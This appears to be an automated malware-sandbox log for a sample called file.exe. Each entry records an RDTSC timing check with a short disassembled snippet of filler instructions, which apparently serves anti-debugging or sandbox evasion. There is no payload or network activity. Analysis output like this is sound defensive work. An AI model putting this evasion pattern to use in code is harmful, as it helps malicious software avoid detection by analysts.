                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2A9 second address: 8BD2BE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43A4BB4C2Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F43A4BB4C26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD838 second address: 8BD83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD83E second address: 8BD842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD842 second address: 8BD84F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD84F second address: 8BD881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F43A4BB4C40h 0x00000010 jmp 00007F43A4BB4C38h 0x00000015 push esi 0x00000016 pop esi 0x00000017 js 00007F43A4BB4C32h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD881 second address: 8BD887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD98E second address: 8BD992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD992 second address: 8BD9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F43A4FCF696h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD9A2 second address: 8BD9AC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43A4BB4C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C388B second address: 8C3896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3896 second address: 8C38A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F43A4BB4C26h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C279F second address: 8C27A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C27A3 second address: 8C27AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C27AC second address: 8C27B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C27B2 second address: 8C27B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C27B8 second address: 8C27BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C27BD second address: 8C27C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C28FD second address: 8C2907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C301F second address: 8C3028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3028 second address: 8C302C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C317E second address: 8C3182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C5696 second address: 8C56BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F43A4FCF6ABh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8516 second address: 8C8539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8539 second address: 8C853D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C853D second address: 8C8541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D00C4 second address: 8D00CE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43A4FCF696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF860 second address: 8CF86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F43A4BB4C26h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF86D second address: 8CF88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F43A4FCF6A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF88B second address: 8CF88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF88F second address: 8CF893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF893 second address: 8CF899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF9DB second address: 8CF9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF9E6 second address: 8CF9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFDF5 second address: 8CFE08 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b ja 00007F43A4FCF696h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFE08 second address: 8CFE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jnl 00007F43A4BB4C26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D355D second address: 8D3563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D37F0 second address: 8D37FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D37FB second address: 8D37FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D37FF second address: 8D3808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3808 second address: 8D3834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A1h 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007F43A4FCF6B9h 0x00000011 jmp 00007F43A4FCF69Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3834 second address: 8D383E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F43A4BB4C26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D950A second address: 8D950E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D950E second address: 8D9514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7CBD second address: 8D7CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7E0A second address: 8D7E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7FCD second address: 8D7FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7FD5 second address: 8D7FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7FDB second address: 8D8000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 jmp 00007F43A4FCF6A4h 0x0000000c jne 00007F43A4FCF69Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D813B second address: 8D8158 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43A4BB4C28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43A4BB4C2Dh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D8158 second address: 8D815E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D84B6 second address: 8D84BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882C80 second address: 882C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882C86 second address: 882CB1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43A4BB4C30h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43A4BB4C34h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882CB1 second address: 882CB6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D8629 second address: 8D862D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D862D second address: 8D8633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E15ED second address: 8E15F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E15F1 second address: 8E160B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F43A4FCF696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F43A4FCF69Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF77E second address: 8DF784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF784 second address: 8DF78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF8C0 second address: 8DF8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DFE1A second address: 8DFE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DFE1E second address: 8DFE38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F43A4BB4C2Eh 0x0000000c jno 00007F43A4BB4C26h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0145 second address: 8E016D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43A4FCF6A9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jnp 00007F43A4FCF696h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E016D second address: 8E0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E047E second address: 8E0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F43A4FCF69Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E09D6 second address: 8E09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4BB4C2Fh 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F43A4BB4C26h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E09F3 second address: 8E0A43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F43A4FCF6A9h 0x00000010 jmp 00007F43A4FCF6A2h 0x00000015 jng 00007F43A4FCF696h 0x0000001b jns 00007F43A4FCF696h 0x00000021 popad 0x00000022 push edx 0x00000023 jc 00007F43A4FCF696h 0x00000029 pushad 0x0000002a popad 0x0000002b pop edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1273 second address: 8E12A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F43A4BB4C39h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E12A0 second address: 8E12BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5266 second address: 8E526D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E46ED second address: 8E46F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E46F3 second address: 8E4703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43A4BB4C2Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E49D3 second address: 8E49E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF69Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E49E5 second address: 8E49E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4B1A second address: 8E4B31 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43A4FCF6A2h 0x00000008 jno 00007F43A4FCF696h 0x0000000e js 00007F43A4FCF696h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4B31 second address: 8E4B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F13ED second address: 8F13F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F13F6 second address: 8F1413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4BB4C31h 0x00000009 jnl 00007F43A4BB4C26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF648 second address: 8EF64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF64C second address: 8EF659 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFC68 second address: 8EFC86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43A4FCF6A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFC86 second address: 8EFC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFDBC second address: 8EFDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F43A4FCF696h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0375 second address: 8F037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F037B second address: 8F037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF12F second address: 8EF158 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43A4BB4C26h 0x00000008 jmp 00007F43A4BB4C34h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 popad 0x00000016 push ebx 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8229 second address: 8F822E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F822E second address: 8F8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43A4BB4C26h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jbe 00007F43A4BB4C26h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F43A4BB4C2Eh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jng 00007F43A4BB4C26h 0x00000025 jmp 00007F43A4BB4C35h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8403 second address: 8F8408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8408 second address: 8F840E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8564 second address: 8F856A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904113 second address: 90412D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C36h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908E5A second address: 908E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908E5E second address: 908E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007F43A4BB4C26h 0x0000000d pop edx 0x0000000e popad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912253 second address: 91225D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91225D second address: 912263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912263 second address: 912269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920614 second address: 92062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C33h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92062B second address: 920649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnp 00007F43A4FCF696h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9207B3 second address: 9207BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
